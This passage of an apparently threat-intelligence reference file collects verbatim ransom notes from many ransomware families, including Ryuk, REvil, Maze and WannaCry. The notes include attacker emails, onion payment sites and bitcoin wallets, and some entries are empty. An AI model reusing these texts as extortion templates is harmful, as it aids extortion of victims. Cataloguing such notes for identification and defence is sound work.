you are 1 of 10000's. 13 | Our only interest is in us getting payed and you getting your files back. 14 | If we were not able to decrypt the data, other people in same situation as you 15 | wouldn't trust us and that would be bad for our buissness -- 16 | So it's not in our interest. 17 | To prove our ability to decrypt your data you have 1 file free decryption. 18 | If you don't want to pay the fee for bringing files back that's okey, 19 | but remeber that you will lose a lot of time - and time is money. 20 | Don't waste your time and money trying to recover files using some file 21 | recovery "experts", we have your private key - only we can get the files back. 22 | With our service you can go back to original state in less then 30 minutes. 
23 | [+] Service [+] 24 | If you decided to use our service please follow instructions below. 25 | Contact us: 26 | email address: afroditasupport@mail2tor.com, put in cc: afroditasupport@firemail.cc 27 | ``` 28 | 29 | ## Antefrigus 30 | ``` 31 | $$$$ $$ $$ $$$$$$ $$$$$ $$$$$$ $$$$$ $$$$$$ $$$$ $$ $$ $$$$ 32 | $$ $$ $$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 33 | $$$$$$ $$ $$$ $$ $$$$ $$$$ $$$$$ $$ $$ $$$ $$ $$ $$$$ 34 | $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 35 | $$ $$ $$ $$ $$ $$$$$ $$ $$ $$ $$$$$$ $$$$ $$$$ $$$$ 36 | 37 | [+] Whats Happen ? [+] 38 | Your files are encrypted, and currently unavailable.You can check it : all files on you computer has expansion hssjyh. 39 | By the way, everything is possible to recover(restore), but you need to follow our instructions.Otherwise, you cant return your data(NEVER). 40 | [+] What guarantees ? [+] 41 | Its just a business.We absolutely do not care about youand your deals, except getting benefits.If we do not do our workand liabilities - nobody will not cooperate with us.Its not in our interests. 42 | To check the ability of returning files, You should go to our website.There you can decrypt one file for free.That is our guarantee. 43 | If you will not cooperate with our service - for us, its does not matter.But you will lose your timeand data, cause just we have the private key.In practise - time is much more valuable than money. 44 | [+] How to get access on website ? [+] 45 | You have two ways : 46 | 1)[Recommended] Using a TOR browser! 47 | a) Download and install TOR browser from this site: https://torproject.org/ 48 | b) Open our website : http://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/?hssjyh 49 | (If you can’t follow the link or other difficulty write to the technical support email : antefrigus@cock.li) 50 | 2) If TOR blocked in your country, try to use VPN! 
For this: 51 | a) Open any browser (Chrome, Firefox, Opera, IE, Edge) and download and install free VPN programm and download TOR browser from this site https://torproject.org/ 52 | b) If you are having difficulty purchase bitcoins, or you doubt in buying decryptor, contact to any data recovery company in your country, they will give you more guarantees and take purchase and decryption procedure on themselves. Almost all such companies heared about us and know that our decryption program work, so they can help you. 53 | When you open our website, put the following data in the input form: 54 | Key: 55 | 56 | Extension name : 57 | hssjyh 58 | ---------------------------------------------------------------------------------------- - 59 | !!!DANGER !!! 60 | DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private keyand, as result, The Loss all data. 61 | !!!!!!!!! 62 | ONE MORE TIME : Its in your interests to get your files back.From our side, we(the best specialists) make everything for restoring, but please should not interfere. 63 | !!!!!!!!! 64 | ``` 65 | 66 | ## Bitpaymer 67 | ``` 68 | Hello %Company_name% 69 | Your network was hacked and encrypted. 70 | No free decryption software is available on the web. 71 | E-mail us at %e-mail% to get the ransom amount. 72 | Keep our contacts safe. Disclosure can lead to impossibility of decryption. 73 | Please, use your company name as the email subject. 74 | TAIL: %base64% 75 | KEY: %base64% 76 | ``` 77 | 78 | ## Buran 79 | Filename: `!!! YOUR FILES ARE ENCRYPTED !!!.TXT` 80 | ``` 81 | All your files, documents, photos, databases and other important 82 | files are encrypted. 83 | 84 | You are not able to decrypt it by yourself! The only method 85 | of recovering files is to purchase an unique private key. 86 | Only we can give you this key and only we can recover your files. 
87 | 88 | To be sure we have the decryptor and it works you can send an 89 | email unique10@protonmail.com or realtime5@protonmail.com and decrypt one file for free. But this 90 | file should be of not valuable! 91 | 92 | Do you really want to restore your files? 93 | Write to email unique10@protonmail.com or realtime5@protonmail.com 94 | 95 | 96 | Your personal ID: 0A123BC4-56DE-78FF-9E01-23ABC256F34E 97 | 98 | Attention! 99 | * Do not rename encrypted files. 100 | * Do not try to decrypt your data using third party software, 101 | it may cause permanent data loss. 102 | * Decryption of your files with the help of third parties may 103 | cause increased price (they add their fee to our) or you can 104 | become a victim of a scam. 105 | ``` 106 | 107 | ## Cerber 108 | ``` 109 | Your documents, photots, databases and other important files have been encrypted! 110 | To decrypt your files follow the instructions: 111 | 112 | 1. Download and install the from https://www.torproject.org/ 113 | 114 | 2. Run it 115 | 116 | 3. In the open website: 117 | http://decrypttozxybarc.onion/BFA2-3DEC-FB00-003F-302B 118 | 119 | 4. Follow the instructions at this website. 120 | ``` 121 | 122 | ## Chacha 123 | ``` 124 | ``` 125 | 126 | ## Clop 127 | ``` 128 | Your network has been penetrated. 129 | All files on each host in the network have been encrypted with a strong algorithm. 130 | Backups were either encrypted or deleted or backup disks were formatted. 131 | Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. 132 | We exclusively have decryption software for your situation 133 | No decryption software is available in the public. 134 | DO NOT RESET OR SHUTDOWN – files may be damaged. 135 | DO NOT RENAME OR MOVE the encrypted and readme files. 136 | DO NOT DELETE readme files. 137 | This may lead to the impossibility of recovery of the certain files. 138 | Photorec, RannohDecryptor etc. 
repair tools are useless and can destroy your files irreversibly. 139 | If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files 140 | (Less than 5 Mb each, non-archived and your files should not contain valuable information 141 | (Databases, backups, large excel sheets, etc.)). 142 | You will receive decrypted samples and our conditions how to get the decoder. 143 | 144 | Attention!!! 145 | Your warranty - decrypted samples. 146 | Do not rename encrypted files. 147 | Do not try to decrypt your data using third party software. 148 | We don`t need your files and your information. 149 | 150 | But after 2 weeks all your files and keys will be deleted automatically. 151 | Contact emails: 152 | servicedigilogos@protonmail.com 153 | or 154 | managersmaers@tutanota.com 155 | 156 | The final price depends on how fast you write to us. 157 | 158 | Clop 159 | ``` 160 | 161 | ## CryptXXX 162 | ``` 163 | ``` 164 | 165 | ## DeathRansom \ Wacatac 166 | Filename: `read_me.txt` 167 | ``` 168 | ????????????????????????? 169 | ??????DEATHRansom ??????? 170 | ????????????????????????? 171 | Hello dear friend, 172 | Your files were encrypted! 173 | You have only 12 hours to decrypt it 174 | In case of no answer our team will delete your decryption password 175 | Write back to our e-mail: deathransom@airmail.cc 176 | 177 | 178 | In your message you have to write: 179 | 1. YOU LOCK-ID: %s 180 | 2. Time when you have paid 0.1 btc to this bitcoin wallet: 181 | 1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N 182 | 183 | 184 | After payment our team will decrypt your files immediatly 185 | 186 | 187 | Free decryption as guarantee: 188 | 1. File must be less than 1MB 189 | 2. Only .txt or .lnk files, no databases 190 | 3. Only 1 files 191 | 192 | 193 | How to obtain bitcoin: 194 | The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment 195 | method and price. 
196 | https://localbitcoins.com/buy_bitcoins 197 | Also you can find other places to buy Bitcoins and beginners guide here: 198 | http://www.coindesk.com/information/how-can-i-buy-bitcoins/ 199 | ``` 200 | 201 | ## Dharma 202 | Filename: `Info.hta` 203 | ``` 204 | All your files have been encrypted! 205 | All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail admin@sectex.net 206 | Write this ID in the title of your message EA0599F6 207 | In case of no answer in 24 hours write us to theese e-mails:admin@sectex.world 208 | You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. 209 | Free decryption as guarantee 210 | Before paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) 211 | How to obtain Bitcoins 212 | The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 213 | https://localbitcoins.com/buy_bitcoins 214 | Also you can find other places to buy Bitcoins and beginners guide here: 215 | http://www.coindesk.com/information/how-can-i-buy-bitcoins/ 216 | Attention! 217 | Do not rename encrypted files. 218 | Do not try to decrypt your data using third party software, it may cause permanent data loss. 219 | Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
220 | ``` 221 | 222 | ## Gandcrab 223 | Filename: `YYLIOZIDKW-MANUAL.txt` 224 | ``` 225 | ---= GANDCRAB V5.2 =--- 226 | 227 | ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** 228 | 229 | *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** 230 | 231 | Attention! 232 | 233 | All your files, documents, photos, databases and other important files are encrypted and have the extension: .YYLIOZIDKW 234 | 235 | The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. 236 | 237 | 238 | The server with your key is in a closed network TOR. You can get there by the following ways: 239 | 240 | ---------------------------------------------------------------------------------------- 241 | 242 | | 0. Download Tor browser - https://www.torproject.org/ 243 | 244 | | 1. Install Tor browser 245 | | 2. Open Tor Browser 246 | | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/b6314679c4ba3647 247 | | 4. Follow the instructions on this page 248 | 249 | ---------------------------------------------------------------------------------------- 250 | 251 | 252 | On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. 253 | 254 | 255 | ATTENTION! 256 | 257 | IN ORDER TO PREVENT DATA DAMAGE: 258 | 259 | * DO NOT MODIFY ENCRYPTED FILES 260 | * DO NOT CHANGE DATA BELOW 261 | 262 | ---BEGIN GANDCRAB KEY--- 263 | %base64_key% 264 | ---END GANDCRAB KEY--- 265 | 266 | ---BEGIN PC DATA--- 267 | %base64_data% 268 | ---END PC DATA--- 269 | ``` 270 | 271 | ## Jigsaw 272 | ``` 273 | ``` 274 | 275 | ## Lockergoga 276 | Filename: `README_LOCKED.txt` 277 | ``` 278 | Greetings! 279 | 280 | There was a significant flaw in the security system of your company. 281 | You should be thankful that the flaw was exploited by serious people and not some rookies. 
282 | They would have damaged all of your data by mistake or for fun. 283 | 284 | Your files are encrypted with the strongest military algorithms RSA4096 and AES-256. 285 | Without our special decoder it is impossible to restore the data. 286 | Attempts to restore your data with third party software as Photorec, RannohDecryptor etc. 287 | will lead to irreversible destruction of your data. 288 | 289 | To confirm our honest intentions. 290 | Send us 2-3 different random files and you will get them decrypted. 291 | It can be from different computers on your network to be sure that our decoder decrypts everything. 292 | Sample files we unlock for free (files should not be related to any kind of backups). 293 | 294 | We exclusively have decryption software for your situation 295 | 296 | DO NOT RESET OR SHUTDOWN - files may be damaged. 297 | DO NOT RENAME the encrypted files. 298 | DO NOT MOVE the encrypted files. 299 | This may lead to the impossibility of recovery of the certain files. 300 | 301 | The payment has to be made in Bitcoins. 302 | The final price depends on how fast you contact us. 303 | As soon as we receive the payment you will get the decryption tool and 304 | instructions on how to improve your systems security 305 | 306 | To get information on the price of the decoder contact us at: 307 | 308 | DharmaParrack@protonmail.com 309 | wyattpettigrew8922555@mail.com 310 | ``` 311 | 312 | ## Locky 313 | ``` 314 | !!! IMPORTANT INFORMATION !!! 315 | 316 | All of your files are encrypted with RSA-2048 and AES-128 ciphers. 317 | More information about the RSA and AES can be found here: 318 | 319 | Decrypting of your files is only possible with private key and decrypt program, which is on our secret server. 320 | To receive your private key follow one of the links: 321 | 322 | If all of this addresses are not available, follow these steps: 323 | 324 | !!! Your personal identification ID: %key% !!! 325 | ``` 326 | 327 | ## Mamo434376 328 | ``` 329 | Merhaba! 
330 | 331 | Sisteminizde önemli gördüğümüz datalarınızı şifreledik. Bilindik veri kurtarma yöntemleri ile verilerinizi geri getiremeyeceğinizi - 332 | bilmenizi isteriz. 333 | Bu yöntemler sadece sizin zaman kaybetmenize sebep olacaktır. 334 | Yinede veri kurtarma firmaları yada programları kullanmak isterseniz lütfen asıl dosyalarınız üzerinde değil, 335 | bunların kopyaları üzerinde işlem yapınız ve/veya yaptırınız. 336 | Asıl dosyaların bozulması verilerinizin geri dönülmez şekilde zarar görmesine sebep olabilir. 337 | Sifrelenen dosyalarınızın asılları, üzerinde rast gele veri yazma tekniğini kullanarak silinmiştir. 338 | 339 | 2 gün içerisinde dönüş yapılmadığı taktirde, sisteminizde kullanılan şifre silinecektir ve verileriniz asla geri döndürülmiyecektir. 340 | 341 | Diskleriniz Full disk encryption ile şifrelenmiştir yetkisiz müdahale kalici veri kaybına neden olur! 342 | 343 | Para verseniz daha açmazlar diyen bilgisayarcılara veya paranı alır dosyalarını vermez diyen - 344 | etrafınızdaki insanlara inanmayın. 345 | Size güven verecek kadar yeterli referansa sahibim. 346 | 347 | Sizi tanımıyorum, dolaysıyla ile size karşı kötü duygular beslemenin size kötülük yapmanın bir anlamı"da yok, 348 | amacım sadece bu işten bir gelir elde etmek. 349 | Ödeme Bitcoin ile yapılmaktadır. 350 | Bitcoin ne olduğunu buradan öğrenebilirsiniz : https://simple.wikipedia.org/wiki/Bitcoin 351 | Yaptığınız ödeme sonrasında, en kısa zamanda verilerinizi eski haline döndürmek için size özel bir şifre çözücü yapacağım - 352 | ve mail yoluyla size göndereceğim, ama tabi bunun için mail yoluyla bizimle iletişime geçmeniz ve bize ID"nizi göndermeniz gerekir. 353 | 354 | Şifre çözme aracının fiyatı 300 dolar. 355 | 24 saat içerisinde dönüş yaparsanız size %50 indirim yapacağım. 356 | 357 | Ödemeyi yapmak ve verilerinizin şifresini çözdürmek için aşağıdaki iletişim kanalından bizimle iletişime geçebilirsiniz. 
358 | 359 | Ulaşmak istediğinizde mutlaka aşağıda size özel üretilen ID"yi eklemeyi unutmayınız. 360 | 361 | SITE_CODE: 362 | ID: XXXXXXXXXX 363 | E-Mail: yardimail1@aol.com 364 | ``` 365 | 366 | ## Maze 367 | Filename: `DECRYPT-FILES.txt` 368 | ``` 369 | Attention! 370 | ---------------------------- 371 | | What happened? 372 | ---------------------------- 373 | All your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. 374 | You cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps. 375 | ---------------------------- 376 | | How to get my files back? 377 | ---------------------------- 378 | The only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. 379 | To contact us and purchase the key you have to visit our website in a hidden TOR network. 380 | There are general 2 ways to reach us: 381 | 1) [Recommended] Using hidden TOR network. 382 | a) Download a special TOR browser: https://www.torproject.org/ 383 | b) Install the TOR Browser. 384 | c) Open the TOR Browser. 385 | d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID% 386 | e) Follow the instructions on this page. 387 | 2) If you have any problems connecting or using TOR network 388 | a) Open our website: https://mazedecrypt.top/%USERID% 389 | b) Follow the instructions on this page. 390 | Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. 391 | On this page, you will see instructions on how to make a free decryption test and how to pay. 392 | Also it has a live chat with our operators and support team. 393 | ---------------------------- 394 | | What about guarantees? 395 | ---------------------------- 396 | We understand your stress and worry. 
397 | So you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer! 398 | If you have any problems our friendly support team is always here to assist you in a live chat! 399 | ------------------------------------------------------------------------------- 400 | THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU 401 | ---BEGIN MAZE KEY--- 402 | %base64key% 403 | ---END MAZE KEY--- 404 | ``` 405 | 406 | ## Megacortex 407 | ``` 408 | ``` 409 | 410 | ## Mircop 411 | ``` 412 | Hello, 413 | 414 | You've stolen 48.48 BTC from the wrong people, please be 415 | so kind to return them and we will return your files... 416 | 417 | Don't take us for fools, we know more about you than 418 | you know about yourself. 419 | 420 | Pay us back and we won't take further action, don't pay 421 | and be prepared. 422 | 423 | 3BGrRU4mhAkCFx1s3Z4yQLCbNg29wtBFj8 424 | ``` 425 | 426 | ## Nemty 427 | ``` 428 | ---=== NEMTY PROJECT ===--- 429 | [+] Whats Happen? [+] 430 | Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension .nemty 431 | By the way, everything is possible to restore, but you need to follow our instructions. Otherwise, you cant return your data (NEVER). 432 | [+] What guarantees? [+] 433 | It's just a business. We absolutely do not care about you and your deals, except getting benefits. 434 | If we do not do our work and liabilities - nobody will not cooperate with us. 435 | It's not in our interests. 436 | If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. 437 | In practise - time is much more valuable than money. 438 | [+] How to get access on website? 
[+] 439 | 1) Download and install TOR browser from this site: https://torproject.org/ 440 | 2) Open our website: zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/pay 441 | When you open our website, follow the instructions and you will get your files back. 442 | Configuration file path: C:\Users\admin 443 | ``` 444 | 445 | ## PureLocker 446 | Filename: `YOUR_FILES.txt` 447 | ``` 448 | #CR1 449 | All your files have been encrypted using: AES-256-CBC + RSA-4096. 450 | Shadows copies were removed, original files were overwritten, renamed and deleted using safe methods. 451 | Recovery is not possible without own RSA-4096 private key. 452 | Only we can decrypt your files! 453 | To decrypt your files contact us at: cr1-silvergold1@protonmail.com 454 | Your private key will be deleted after 7 days starting from: 15/10/2019, after that the recovery of your files will not be possible. 455 | ``` 456 | 457 | ## Revil (Sodinokibi) 458 | Filename: `kd2p9-readme.txt` 459 | ``` 460 | ---=== Welcome. Again. ===--- 461 | 462 | [+] Whats Happen? [+] 463 | 464 | Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion kd2p9. 465 | By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). 466 | 467 | [+] What guarantees? [+] 468 | 469 | Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. 470 | To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. 471 | If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. 472 | 473 | [+] How to get access on website? 
[+] 474 | 475 | You have two ways: 476 | 477 | 1) [Recommended] Using a TOR browser! 478 | a) Download and install TOR browser from this site: https://torproject.org/ 479 | b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C2D97495C4BA3647 480 | 481 | 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: 482 | a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) 483 | b) Open our secondary website: http://decryptor.top/C2D97495C4BA3647 484 | 485 | Warning: secondary website can be blocked, thats why first variant much better and more available. 486 | 487 | When you open our website, put the following data in the input form: 488 | Key: 489 | 490 | %base64_key% 491 | 492 | 493 | 494 | Extension name: 495 | 496 | kd2p9 497 | 498 | ----------------------------------------------------------------------------------------- 499 | 500 | !!! DANGER !!! 501 | DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. 502 | !!! !!! !!! 503 | ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. 504 | !!! !!! !!! 505 | ``` 506 | 507 | ## Robbinhood 508 | ``` 509 | ``` 510 | 511 | ## Ryuk 512 | Filename: `RyukReadMe.txt` 513 | ``` 514 | Your network has been penetrated. 515 | 516 | All files on each host in the network have been encrypted with a strong algorithm. 517 | 518 | Backups were either encrypted or deleted or backup disks were formatted. 519 | Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. 520 | 521 | We exclusively have decryption software for your situation 522 | No decryption software is available in the public. 523 | 524 | DO NOT RESET OR SHUTDOWN - files may be damaged. 
525 | DO NOT RENAME OR MOVE the encrypted and readme files. 526 | DO NOT DELETE readme files. 527 | This may lead to the impossibility of recovery of the certain files. 528 | 529 | To get info (decrypt your files) contact us at 530 | WayneEvenson@protonmail.com 531 | or 532 | WayneEvenson@tutanota.com 533 | 534 | BTC wallet: 535 | 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk 536 | 537 | Ryuk 538 | 539 | No system is safe 540 | ``` 541 | 542 | ## Samsam 543 | ``` 544 | ``` 545 | 546 | ## Snake / Ekans 547 | ``` 548 | -------------------------------------------- 549 | | What happened to your files? 550 | -------------------------------------------- 551 | 552 | We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more - all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry! 553 | 554 | You can still get those files back and be up and running again in no time. 555 | 556 | --------------------------------------------- 557 | | How to contact us to get your files back? 558 | --------------------------------------------- 559 | 560 | The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network. 561 | 562 | Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with better cyber security in mind. If you are interested in purchasing the decryption tool contact us at bapcocrypt@ctemplar.com 563 | 564 | ------------------------------------------------------- 565 | | How can you be certain we have the decryption tool? 566 | ------------------------------------------------------- 567 | 568 | In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets). 569 | 570 | We will send them back to you decrypted. 
571 | ``` 572 | 573 | ## Snatch 574 | #1 Filename: `Readme_Restore_Files.txt` 575 | ``` 576 | All your files are encrypted 577 | Do not try modify files 578 | My email imBoristheBlade@protonmail.com 579 | ``` 580 | 581 | #2 Filename: `RESTORE_DGLNL_FILES.txt` 582 | ``` 583 | Your all your files are encrypted and only I can decrypt them. 584 | Contact me: 585 | doctor666@mail.fr or doctor666@cock.li 586 | Write me if you want to return your files - I can do it very quickly 587 | The header of the letter must contain the extension of the encryptor. 588 | Attention 589 | Do not rename encrypted files. You may have permanent data loss. 590 | To prove that I can recover your files, I am ready to decrypt any three files (less than 1Mb) for free (except databases, Excel and backups) 591 | hurry up 592 | If you do not email me in the next 48 hours then your data may be lost permanently 593 | ``` 594 | 595 | ## Vegalocker 596 | ``` 597 | ``` 598 | 599 | ## Wannacry 600 | Filename: `@Please_Read_Me@.txt` 601 | ``` 602 | Q: What's wrong with my files? 603 | 604 | A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. 605 | If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! 606 | Let's start decrypting! 607 | 608 | Q: What do I do? 609 | 610 | A: First, you need to pay service fees for the decryption. 611 | Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw 612 | 613 | Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. 614 | Run and follow the instructions! (You may need to disable your antivirus for a while.) 615 | 616 | Q: How can I trust? 617 | 618 | A: Don't worry about decryption. 619 | We will decrypt your files surely because nobody will trust us if we cheat users. 620 | 621 | 622 | * If you need our assistance, send a message by clicking on the decryptor window. 
623 | ``` 624 | --------------------------------------------------------------------------------